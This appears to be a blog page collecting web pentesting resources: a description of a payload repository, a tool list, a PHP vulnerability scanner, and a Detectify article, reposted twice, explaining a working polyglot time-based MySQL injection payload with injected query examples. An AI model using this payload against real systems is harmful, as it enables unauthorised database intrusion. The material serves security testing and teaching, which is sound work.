Payloads All The Things

Payloads All The Things 

A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I ❤️ pull requests 🙂

You can also contribute with a 🍻 IRL, or using the sponsor button.

Every section contains the following files, you can use the _template_vuln folder to create a new chapter:

  • README.md – vulnerability description and how to exploit it, including several payloads
  • Intruder – a set of files to give to Burp Intruder
  • Images – pictures for the README.md
  • Files – some files referenced in the README.md

You might also like the Methodology and Resources folder :

You want more ? Check the Books and Youtube videos selections.

PentestingTool

Burp Suite https://portswigger.net/burp/communitydownload

OWASP ZAP https://www.zaproxy.org/download/

Dirb https://github.com/v0re/dirb.git

Dirbuster https://gitlab.com/kalilinux/packages/dirbuster.git

Gobuster https://github.com/OJ/gobuster.git

Wfuzz https://github.com/xmendez/wfuzz.git

Sublist3r https://github.com/aboul3la/Sublist3r.git

Massdns

Dnsenum

Knockpy

nmap

Masscan

Sn1per

XSStrike

Sqlmap

Wpscan

Joomscan

CMSmap

Builtwith

Wappalyzer

wafw00f

VulnyCode – PHP Code Static Analysis 

Basic script to detect vulnerabilities into a PHP source code, it is using Regular Expression to find sinkholes.

# HELP
╭─ 👻 swissky@crashlab: ~/Github/PHP_Code_Static_Analysis  ‹master*›
╰─$ python3 index.py           
usage: index.py [-h] [--dir DIR] [--plain]

optional arguments:
  -h, --help  show this help message and exit
  --dir DIR   Directory to analyse
  --plain     No color in output

# Example
╭─ 👻 swissky@crashlab: ~/Github/PHP_Code_Static_Analysis  ‹master*›
╰─$ python3 index.py --dir test    
------------------------------------------------------------
Analyzing 'test' source code
------------------------------------------------------------
Potential vulnerability found : File Inclusion
Line 19 in test/include.php
Code : include($_GET['patisserie'])
------------------------------------------------------------
Potential vulnerability found : Insecure E-mail
Line 2 in test/mail.php
Code : mail($dest, "subject", "message", "", "-f" . $_GET['from'])
Declared at line 1 : $dest = $_GET['who'];

Currently detecting :

  • Arbitrary Cookie
  • Arbitrary File Deletion
  • Arbitrary Variable Overwrite
  • Cross Site Scripting
  • File Inclusion
  • File Inclusion / Path Traversal
  • File Upload
  • Header Injection
  • Information Leak
  • Insecure E-mail
  • Insecure Weak Random
  • LDAP Injection
  • PHP Object Injection
  • Remote Code Execution
  • Remote Command Execution
  • Server Side Request Forgery
  • Server Side Template Injection
  • SQL Injection
  • URL Redirection
  • Weak Cryptographic Hash
  • XML external entity
  • XPATH Injection
  • Hardcoded credentials
  • High Entropy string

if you want to export each vulnerabilities type into a folder use the “export.sh”

Don’t forget to read the license 😉

Alternatives

The Ultimate SQL Injection Payload

May 29, 2013

At Detectify we often try to find the most effective way of pen testing web applications. Many researchers (and tools) use a lot of different payloads to find SQL Injections, but what if there was a payload that works in all cases? Well (un)fortunately we couldn’t find such a payload, but we invented something close! The adapting payload.

The adapting payload works in all cases where a MySQL Injection vulnerability is present and it looks like this:

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

If the server waits for about a second when sending this payload, chances are there’s a MySQL Injection present! But how does it work? Let’s break it down:

Adapting to MySQL version

The first thing the payload does is to check if the MySQL Version supports the SLEEP() function. If it doesn’t, the payload will instead use the BENCHMARK() function. These functions makes the server wait for a given amount of time and the adaption between SLEEP() and BENCHMARK() makes it work on all MySQL versions.

Adapting to quotation

The second trick the payload will do is to adapt to which kind of quotation is used. This is done by using binary functions (OR and XOR) to concatenate the strings without breaking the syntax.

Example 1:

SELECT * FROM some_table WHERE double_quotes = "[Injection point]"
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

Example 2:

UPDATE some_table SET secret_value = '[Injection point]'
UPDATE some_table SET secret_value = 'IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/'

As you can see, the payload will execute our BENCHMARK() or SLEEP() regardless of which quotes are used.

Adapting to non-encapsulated queries

Last, if the payload is not encapsulated within quotes or single quotes, the payload will put “the rest” of the payload within a multi-line comment to avoid a syntax error.

Example:

SELECT 1,2,["Injection point"] FROM some_table WHERE ex = ample
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample

So one payload to rule them all huh? Well unfortunately research time ran out before we could extend the payload to other DBMS’s, but for now if you’re using MySQL, feel free to use this for finding SQL Injections on your own installation!

PS. Got tired of searching for SQL injections by hand? You could always give Detectify a try and let automation do the work! Sign up for a free trial and go get those SQL injections »

The Ultimate SQL Injection Payload

May 29, 2013

At Detectify we often try to find the most effective way of pen testing web applications. Many researchers (and tools) use a lot of different payloads to find SQL Injections, but what if there was a payload that works in all cases? Well (un)fortunately we couldn’t find such a payload, but we invented something close! The adapting payload.

The adapting payload works in all cases where a MySQL Injection vulnerability is present and it looks like this:

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

If the server waits for about a second when sending this payload, chances are there’s a MySQL Injection present! But how does it work? Let’s break it down:

Adapting to MySQL version

The first thing the payload does is to check if the MySQL Version supports the SLEEP() function. If it doesn’t, the payload will instead use the BENCHMARK() function. These functions makes the server wait for a given amount of time and the adaption between SLEEP() and BENCHMARK() makes it work on all MySQL versions.

Adapting to quotation

The second trick the payload will do is to adapt to which kind of quotation is used. This is done by using binary functions (OR and XOR) to concatenate the strings without breaking the syntax.

Example 1:

SELECT * FROM some_table WHERE double_quotes = "[Injection point]"
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

Example 2:

UPDATE some_table SET secret_value = '[Injection point]'
UPDATE some_table SET secret_value = 'IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/'

As you can see, the payload will execute our BENCHMARK() or SLEEP() regardless of which quotes are used.

Adapting to non-encapsulated queries

Last, if the payload is not encapsulated within quotes or single quotes, the payload will put “the rest” of the payload within a multi-line comment to avoid a syntax error.

Example:

SELECT 1,2,["Injection point"] FROM some_table WHERE ex = ample
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample

So one payload to rule them all huh? Well unfortunately research time ran out before we could extend the payload to other DBMS’s, but for now if you’re using MySQL, feel free to use this for finding SQL Injections on your own installation!

PS. Got tired of searching for SQL injections by hand? You could always give Detectify a try and let automation do the work! Sign up for a free trial and go get those SQL injections »

https://github.com/swisskyrepo/GraphQLmap

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.